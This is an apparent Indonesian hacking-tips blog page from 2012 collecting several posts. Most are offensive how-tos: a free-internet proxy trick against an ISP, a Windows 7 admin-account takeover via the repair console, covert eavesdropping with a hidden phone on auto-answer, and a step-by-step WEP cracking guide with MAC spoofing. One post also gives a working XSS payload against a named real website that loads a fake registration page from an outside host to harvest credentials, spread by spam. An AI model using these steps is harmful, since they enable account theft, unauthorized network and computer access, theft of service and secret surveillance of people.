™Sharing For Anything™

Monday, January 23, 2012

Trik Internet Gratis Smartfren Di PC Dengan ISPCE

Langsung Aja Gan ..!!

- Buka ISPCE
- Klik main menu
- Centang semua termasuk Use Proxy dan Query Mode
- Isi Listen Poty : 8088
- Isi Front Query : wap.smartwap.net@ atau wap.smartfren.co.id@ atau wap.facebook.com@
- Klik Proxy Configuration
- Isi server dengan :
Proxy : 10.20.27.250
Port : 8080
- Klik Start

Settingan di Browser
Proxy : 127.0.0.1
Port : 8088

Jika ada hal yang kurang jelas bisa ditanyakan di Twitter @chandramaciplez atau Facebook Chandra MacipeLz BiLoba

ISPCE

Cara Enable Registry, CMD, TaskManager Yang Di Disable

Masalah Pada Registry :
Cara 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke “Administrative Templates – System – Prevent Access To Registry Editing
Tools”
* Ubah Valuenya menjadi = Enabled, Pilih “No”, klik Apply.

Cara 2 :

* Buka folder “C : \Windows”
* Cari file Regedit.exe
* Rename / Ganti nama file tersebut, misal : “New_Reg.exe”

Masalah Pada CMD [Command Prompt] :
Cara 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke “Administrative Templates – System – Prevent Access To Command Prompt”
* Ubah Valuenya menjadi = Enabled, Pilih “No”, klik Apply.

Cara 2 :

* Menjalankan Perintah Update Registry dengan RUN Klik menu START--> RUN pada kotak
dialog, ketik atau copy perintah dibawah ini :
REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t
REG_DWORD /d 0 /f

Klik tombol OK

* Menjalankan Kembali Command Prompt :
Klik menu START--> RUN
Kemudian ketik CMD pada area teks box input
atau
Klik menu STAR --> PROGRAM --> ACCESORIES --> COMMAND PROMPT

Masalah Pada Task Manager :
Cara 1 :

* Buka RUN atau dengan tekan tombol WIN + R
* Isikan GPEDIT.MSC
* Masuk ke “Administrative Templates – System – Ctrl+Alt+Del Option – Remove Task
Manager”
* Ubah Valuenya menjadi “Enable”, ingat ! kemudian Ubah lagi menjadi “Disable” atau
“Not Configured”.
* Apply

Cara 2 :

* Buka RUN atau tekan tombol WIN + R
* isikan dengan :

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD /d 0 /f

* OK

Cara 3 :

* Buka RUN ketikan Regedit
* Masuk pada alamat HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
* Buat Registry baru type “DWORD” dengan nama “DisableTaskMgr”
* isikan value nya = 0

Tekhnik Membuat Halaman Login Palsu Dengan XSS Attack

Banyak yang bertanya, apa hebat & bahayanya sih XSS?
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:

*Apa hebatnya sih, cuman nulis di URL doank
*Begituan mah gak ada gunanya
*XSS mah gak bisa dideface halamannya
*Itu kan cuman perubahan address doank

Saya hanya tersenyum ketika mendengar diskusi mengenai hal ini :)
Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya "STEALING ACCOUNT IN VULNERABLE WEBSITE". (Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan)

Dalam hal ini saya memanfaatkan XSS dikombinasikan dengan Human Vulnerability, karena semua pasti sudah mengetahui, bahwa Manusia Adalah Unpatched Vulnerability.
Skenarionya adalah:
1. Kita mendapatkan vulnerable website yang bisa dilakukan XSS
2. Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.
3. Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.
Tunggu & kita mendapatkannya deh.. :)

Langkah-langkahnya adalah :
PERTAMA
* Saya menggunakan vulnerable XSS dari website www.eset.com.mx, ESET merupakan salah satu perusahaan AntiVirus yang juga sangat terkenal di Dunia, namun memiliki kelemahan juga di websitenya.
* Test XSS apakah bisa berjalan di website, berikut contohnya: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ccenter%3E%3Cfont%20size=%22300%22%3EBinus%20Hacker%20Ada%20Disini%3Cbr%3Ehttp://www.binushacker.net%3C/font%3E%3C/center%3E%3C/

* Test cookies (ternyata ada), berhubung artikelnya bukan stealing cookies, kita lewatin aja :)
* Oke, sudah ketahuan websitenya vulnerable

KEDUA
* Dalam benak, banyak ide, antara login & register pages.
* Akhirnya kembali coding, membuat page halaman register di ESET

* Kemudian membuat php untuk menerima hasil & menyimpannya di log, berikut:

* Fake register tadi yang saya buat saya simpan di http://restinpeace.biz/eset/ (CONTOH), permission filenya sudah disetting supaya tidak bisa dibaca filenya, hanya bisa melihat directorynya. Hehehe.. :D

KETIGA
* Disini kita akan menggunakan html code "iframe"
* Sebelum kita melakukan aksi, maka code XSS:

Code:

di encode dulu menjadi:

Code:

%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E

* Copy code tersebut ke URL sehingga menjadi: http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E

* Sudah selesai page untuk fake register, lanjut ke step selanjutnya.

KEEMPAT
* Sebarkan melalui email, chat, messenger dan sebagainya, silakan gunakan cara masing-masing. Anda disini belajar menjadi spammer & phiser (Ingat! Artikel ini hanya untuk pembelajaran, kita tidak akan lebih baik jika melakukan kejahatan, namun akan lebih berguna jika kita memiliki ilmu agar tidak terjebak & tertipu oleh penjahat!)

KELIMA
* Kita tunggu hasilnya & kita cek log yang masuk
* Taaaadddddaaaaaa, ada beberapa yang masuk :D

Source Code

Cara Mudah Login Ke Windows 7 Sebagai Administrator

Pada versi sebelumnya, windows XP mudah dimasuki oleh para pengguna yang tidak mengetahui password user yang ada, sehingga orang yang tidak mengetahui passwordnya akan memasuki akun administrator. Tetapi pada versi windows 7 akun administrator secara default di hidden oleh system sehingga pengguna awam yang tidak tahu password tidak dapat memasuki akun. Oleh sebab itu, ada cara yang bisa di coba untuk masuk ke windows 7 administrator dengan cara dibawah ini.

Caranya sebagai berikut :
1. Sebelum windows ter-boot tekan F8
2. Lalu pilih Repair your computer
3. Setelah sudah tampil interface dari Jendela Repair Your Computer, klik Open Command Prompt,
4. Lalu tulis ” net user administrator /active:yes”
5. Setelah ada pesan the command active successfully
6. Lalu tulis ” net user administrator password anda ” ganti kata password anda sesuai keinginan,
7. Lalu tutup command prompt
8. Klik restart komputer
Semoga Bermanfaat

Sumber : binushacker

Cara Mengubah Handphone Menjadi Alat Mata - Mata

Ada kalanya Anda benar-benar tak percaya atau curiga pada seseorang, dan ingin tahu apa pembicaraan yang dilakukan olehnya. Jurus yang paling gamblang, Anda bisa lakukan aksi memata-matai(intai), toh saat ini sudah tersedia beragam gadget ber-genre spionase ala Jams Bond. Tapi gadget tersebut biasanya tak murah, dan instalasinya tak sederhana. Ketimbang repot-repot, berdayakan kemampuan handphone Agan untuk aksi ini. Tak perlu smartphone kelas wahid untuk ini, handphone kelas standar pun bisa.

Bagaimana caranya? Tak lain memanfaatkan fitur auto answer. Sejatinya fitur ini bukan untuk tujuan mata-mata, hanya implementasi yang bisa disesuaikan dengan beragam kebutuhan , semisal untuk mengawasi apakah bayi dirumah sedang tidur atau menangis. Untuk lebih jelasnya, berikut langkah-langkahnya.

1. Matikan Speaker pada handphone, atau bisa juga setting hape dalam mode silent. Jangan gunakan mode getar(vibrate)
2. Aktifkan fitur auto answer, fitur ini tidak selalu ada di setiap handphone, dismarphone Symbian S60, iPhone dan Windows Mobile fitur ini dipastikan sudah ada.
3. Atur setting pada fitur Auto Answer, dengan pilihan jeda waktu, artinya hape aka otomatis `menjawab' panggilan masuk setelah waktu yang ditentukan.
4. Dan, yang paling penting, letakan handphone pada posisi tersembunyi tapi tetap terbuka
5. Auto Answaer pada dasarnya adalah fitur yang bekerja untuk moda hanfree operation
6. Bila semua sudah siap, Agan tinggal lakukan panggilan ke handphone tadi, dan dari jauh agan bisa mendengar isi ppembicaraan yang diinginkan. Sasaran pun tak sadar bila ada hape yang sedang aktif `menguping'
7. Modus ini lebih optimal digunakan pada ruangan indoor/kamar

Courtesy of Tabloid Handphone

Melewati Link Download Tanpa Harus Menunggu

Hallo agan2, semua pasti udah pada tau "Adf.ly" kan??? Pastinya doongg,, pasti agan2 kesel pas diminta nunggu 5 detik untuk menuju ke link download nya, kalo link nya 1 sih gak masalah, kalo banyak..??
Langsung aja gan, This the step...
1. Masuk Ke Situs Ini → http://hoangmanhhiep.info/adf/

2. Paste Link "adf.ly" yang akan kita lewati didalam kolom yang berwarna putih, dan klik "Get Link"

3. Tunggu beberapa detik dan Keluar deh Hasilnya...

Khusus untuk rapidshare.com, megaupload.com, hotfile.com, fileserve.com, filefactory.com, depositfiles.com, filesonic.com, netload.in, uploading.com, easy-share.com, uploaded.to, mediafire.com, megashares.com, gigasize.com, bitshare.com, oron.com, gigasize.com, uploadstation.com, megavideo.com teman - teman bisa langusung menuju ke http://vinaleech.com/linkchecker/

Cara Hack WiFi atau Wireless Password

Halo gan, saya hari ini akan menjelaskan kepada anda cara untuk memecahkan Wifi atau sandi nirkabel hanya dalam 10 sampai 15 menit. Hari ini saya akan menjelaskan Cara Hack atau Crack Wifi Password. Hari hack akan didasarkan pada retak password enkripsi WEP. Jadi orang mengencangkan ikat pinggang Anda untuk baru hack dan mari kita mulai hack wifi. Saya juga memasukkan video di bawah posting. Jadi anda bisa membaca dan menonton ....

LANGKAH UNTUK HACK PASSWORD ATAU WIRELESS WIFI

1. Dapatkan CD Backtrack-Linux
. Backtrack Linux Live CD (Linux terbaik tersedia untuk hacker dengan lebih dari 2000 hacking tools built-in).
Download Backtrack Linux Live CD dari sini: http://www.backtrack-linux.org/downloads/

2. SCAN UNTUK MENDAPATKAN KORBAN

Dapatkan korban serangan itu adalah password yang ingin Anda hack atau crack.
Sekarang Masukkan Backtrack Linux CD ke dalam drive CD Anda dan memulainya. Setelah itu klik mulai pada kotak hitam di sudut kiri bawah untuk memuat sebuah "Konsole". Sekarang Anda harus mulai kartu Wifi. Untuk melakukannya ketik:
airmon-ng

Anda akan melihat nama kartu nirkabel Anda. (saya adalah bernama "ath0") Dari sini anda keluar, ganti nama kartu anda dengan "ath0". Sekarang ketik:
airmon-ng stop ath0

kemudian ketik:

ifconfig wifi0 down

kemudian ketik:

macchanger --mac 00:11:22:33:44:55 wifi0

kemudian ketik:

airmon-ng start wifi0

langkah-langkah di atas telah menjelaskan unt memalsukan diri dari dilacak. Pada langkah di atas kita spoofing MAC address kita, ini akan membuat kita tidak dapat ditemukan.

sekarang ketik:

airodump-ng ath0

Semua langkah di atas dalam satu screen shot:

Sekarang Anda akan melihat daftar jaringan nirkabel di Konsole. Beberapa akan memiliki sinyal yang lebih baik dari yang lain dan selalu nya ide yang baik untuk memilih satu yang memiliki kekuatan sinyal yang terbaik selain itu akan memakan waktu yang sangat besar untuk crack atau hack password atau Anda mungkin tidak dapat retak sama sekali.
Setelah Anda melihat daftar jaringan, sekarang pilih jaringan yang ingin Anda hack. Untuk membekukan layar airodump TAHAN tombol CNTRL dan Tekan C.
Sekarang Anda akan melihat sesuatu seperti ini:

3. MEMILIH JARINGAN UNTUK HACKING

Sekarang menemukan jaringan yang ingin Anda hack dan PASTIKAN bahwa ia mengatakan enkripsi untuk jaringan yang WEP. Jika tertulis WPA atau variasi WPA kemudian berpindah ... Anda masih dapat crack WPA dengan mundur dan beberapa alat lainnya tetapi adalah permainan bola seluruh lain dan Anda perlu menguasai WEP pertama.

Setelah Anda memutuskan jaringan, mencatat nomor saluran dan BSSID. BSSID akan terlihat seperti ini -

00:23:69:bb:2d:of

Jumlah Channel akan berada di bawah sebuah heading yang mengatakan "CH".
Seperti ditunjukkan dalam gambar ini:

Sekarang di Konsole jenis jendela yang sama:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

Sekarang di jendela yang sama jenis Konsole: Nama file dapat apa pun yang Anda inginkan. File ini adalah tempat di mana airodump akan menyimpan paket info yang Anda terima untuk kemudian retak. Anda bahkan tidak dimasukkan dalam ekstensi ... hanya memilih kata acak yang akan Anda ingat. Saya biasanya membuat saya "Ben" karena saya selalu bisa mengingatnya. Its hanya karena i love Ben10 .... hhahahahaha: D

Catatan: Jika Anda ingin retak lebih dari satu jaringan dalam sesi yang sama, Anda harus memiliki nama file yang berbeda untuk setiap satu atau itu tidak akan berhasil. Saya biasanya nama mereka sebagai ben1, ben2 dll

Setelah Anda mengetikkan perintah terakhir, layar airodump akan berubah dan mulai menunjukkan komputer Anda paket pertemuan. Anda juga akan melihat pos bertanda "IV" dengan nomor di bawahnya. Ini adalah singkatan untuk "Inisialisasi Vektor" tetapi secara umum semua ini berarti "paket dari info yang berisi karakter dari password." Setelah Anda mendapatkan minimal 5.000 IV ini, Anda dapat mencoba untuk memecahkan password. Aku sudah retak tepat beberapa di 5.000 dan yang lainnya telah mengambil alih 60.000. Ini tergantung pada berapa lama dan sulit mereka membuat password. Lebih sulit adalah paket password semakin Anda akan perlu untuk memecahkannya.

4. Cracking password WEP

Sekarang tinggalkan jendela ini Konsole dan berjalan dan membuka jendela Konsole 2.
Dalam tipe window:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

Ini akan mengirimkan beberapa perintah untuk router bahwa pada dasarnya itu adalah untuk mengaitkan komputer Anda meskipun Anda tidak resmi berhubungan dengan password. Jika perintah ini berhasil, Anda akan melihat sekitar 4 baris mencetak teks keluar dengan yang terakhir mengatakan sesuatu yang mirip dengan "Asosiasi :-) Sukses"
Jika ini terjadi, maka baik! Anda hampir ada.

Sekarang ketik:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

Ini akan menghasilkan sekelompok teks dan kemudian Anda akan melihat baris mana komputer Anda adalah mengumpulkan segudang paket dan menunggu di ARP dan ACK. Jangan khawatir tentang apa artinya ini ... hanya tahu bahwa ini adalah tiket makan Anda. Sekarang Anda hanya duduk dan menunggu. Setelah komputer Anda akhirnya mengumpulkan sebuah permintaan ARP, ia akan mengirim kembali ke router dan mulai menghasilkan ratusan ARP dan ACK per detik. Kadang-kadang ini mulai terjadi dalam hitungan detik ... kadang-kadang Anda harus menunggu hingga beberapa menit. Hanya bersabar. Ketika akhirnya tidak terjadi, beralih kembali ke jendela pertama Konsole anda dan anda akan melihat nomor di bawah IV mulai meningkat pesat. Ini hebat! Ini berarti Anda hampir selesai! Bila jumlah ini mencapai SEDIKITNYA 5.000 maka Anda dapat mulai membobol password anda. Mungkin akan memakan waktu lebih dari ini, tetapi saya selalu memulai sandi saya cracking di 5.000 hanya jika mereka memiliki password yang benar-benar lemah.

Sekarang anda perlu membuka 3 dan jendela Konsole akhir. Hal ini akan berada di tempat kita sebenarnya crack password.
Sekarang ketik:

aircrack-ng -b (bssid) (filename)-01.cap

Ingat nama file yang dibuat sebelumnya? Tambang adalah "Ben". Jangan menempatkan spasi di antara itu dan-01.cap sini. Jenis sebagai Anda melihatnya. Jadi bagi saya, saya akan ketik wepkey-01.cap
Setelah Anda melakukan ini, Anda akan melihat api aircrack dan mulai crack password. biasanya Anda harus menunggu lebih seperti 10.000 hingga 20.000 IV sebelum akan retak. Jika hal ini terjadi, aircrack akan menguji apa yang Anda miliki sejauh ini dan kemudian akan mengatakan sesuatu seperti "tidak cukup IV Coba lagi di 10.000.."
JANGAN LAKUKAN APA PUN! Ini akan tetap berjalan ... itu hanya membiarkan Anda tahu bahwa itu ada di jeda sampai lebih IV berkumpul. Setelah Anda melewati tanda 10.000 maka secara otomatis akan menjalankan lagi dan mencoba untuk memecahkannya. Jika ini gagal maka akan mengatakan "tidak cukup IV Coba lagi di 15.000.." dan seterusnya sampai akhirnya mendapatkannya.

Jika Anda melakukan semuanya dengan benar sampai titik ini, sebelum terlalu lama Anda akan memiliki password! sekarang jika password tampak konyol, khawatir dont, itu akan tetap bekerja. beberapa password disimpan dalam format ASCII, dalam hal ini, aircrack akan menunjukkan kepada Anda apa karakter mereka ketik in untuk password mereka. Kadang-kadang, meskipun, password tersebut disimpan dalam format HEX dalam hal komputer akan menampilkan enkripsi HEX dari password. Tidak masalah dengan cara baik, karena Anda dapat mengetik di salah satu dan akan menghubungkan Anda ke jaringan.

Perhatikan, bahwa password akan selalu ditampilkan di aircrack dengan tanda titik setelah setiap 2 karakter. Jadi misalnya jika password adalah "rahasia", akan ditampilkan sebagai:

se:cr:et

Hal ini jelas akan menjadi format ASCII. Jika itu adalah HEX sandi terenkripsi itu adalah sesuatu seperti "0FKW9427VF" maka akan tetap ditampilkan sebagai:

0F:KW:94:27:VF

Hanya menghilangkan tanda titik dua dari password, boot kembali ke sistem operasi apa pun yang Anda gunakan, mencoba untuk terhubung ke jaringan dan ketik password tanpa titik dua dan presto! Anda berada di!

Ini mungkin tampak seperti banyak berurusan dengan jika Anda belum pernah melakukannya, tapi setelah mencoba beberapa berhasil, Anda akan menjadi sangat cepat dengan itu. Jika saya di dekat sebuah router WEP dienkripsi dengan sinyal yang baik, saya sering bisa memecahkan sandi hanya dalam beberapa menit.

Saya tidak bertanggung jawab atas apa yang Anda lakukan dengan informasi ini. Setiap kegiatan / berbahaya ilegal yang anda lakukan, jatuh sepenuhnya pada Anda karena ... teknis ... ini hanya bagi Anda untuk menguji keamanan jaringan Anda sendiri.

Monday, January 23, 2012

Kode Warna